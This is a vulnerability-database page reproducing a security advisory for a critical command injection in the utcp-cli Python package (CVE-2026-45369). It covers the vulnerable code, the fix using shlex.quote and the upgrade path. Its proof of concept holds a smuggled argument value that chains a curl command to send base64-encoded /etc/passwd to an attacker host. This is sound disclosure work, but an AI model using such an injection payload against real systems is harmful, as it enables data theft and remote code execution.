What is GHSA-33p6-5jxp-p3x4?

GHSA-33p6-5jxp-p3x4 is a security advisory published by GitHub Security Advisories with Critical severity. utcp-cli Vulnerable to Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

Which CVE IDs does GHSA-33p6-5jxp-p3x4 cover?

GHSA-33p6-5jxp-p3x4 covers the following CVE IDs: CVE-2026-45369. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-33p6-5jxp-p3x4?

GHSA-33p6-5jxp-p3x4 has a CVSS v3 base score of 10.0, published by GitHub Security Advisories.

Which products are affected by GHSA-33p6-5jxp-p3x4?

GHSA-33p6-5jxp-p3x4 affects 1 product, including: pip/utcp-cli:\u003c= 1.1.1.

GHSA-33p6-5jxp-p3x4CriticalCVSS 10.0

utcp-cli Vulnerable to Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

Vendor

GitHub Security Advisories

Published

May 14, 2026

Last Modified

May 15, 2026

🔗 CVE IDs covered (1)

CVE-2026-45369 →

📋 Description

## Summary The `_substitute_utcp_args` method in `cli_communication_protocol.py` inserts user-controlled `tool_args` values directly into shell command strings without any sanitization or escaping. These commands are then executed via `/bin/bash -c` (Unix) or `powershell.exe -Command` (Windows), allowing an attacker to inject arbitrary shell commands. ## Affected File `plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py` ## Vulnerable Code ```python def replace_placeholder(match): arg_name = match.group(1) if arg_name in tool_args: return str(tool_args[arg_name]) # No escaping applied ``` The substituted command is then embedded directly into a shell script: ```python script_lines.append(f'{var_name}=$({substituted_command} 2>&1)') ``` And executed via: ```python shell_cmd = ['/bin/bash', '-c', script] ``` ## Proof of Concept Given a tool defined as: ```json {"command": "python script.py --input UTCP_ARG_filename_UTCP_END"} ``` Calling with: ```python tool_args = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"} ``` Produces and executes: ```bash CMD_0_OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2>&1) ``` This results in full Remote Code Execution on the host system. ## Patched Fixed in `utcp-cli` 1.1.2. `_substitute_utcp_args` now shell-quotes every substituted value: `shlex.quote` on Unix, a PowerShell single-quoted literal on Windows. Each `UTCP_ARG_..._UTCP_END` placeholder therefore expands to exactly one shell token, blocking metacharacter injection (`;`, `|`, `&`, backticks, `$()`, newlines). **Behavior change:** tools that relied on a single placeholder splitting into multiple shell tokens (e.g. `UTCP_ARG_flags_UTCP_END` -> `--verbose --debug`) must now use one placeholder per intended argument. ## Mitigation Upgrade to `utcp-cli >= 1.1.2`. There is no workaround in earlier versions short of refusing all attacker-controlled `tool_args`. ## Credit Reported by @ZeroXJacks.

🎯 Affected products1

pip/utcp-cli:<= 1.1.1

🔗 CVE IDs covered (1)

📋 Description

🎯 Affected products1

🔗 References (3)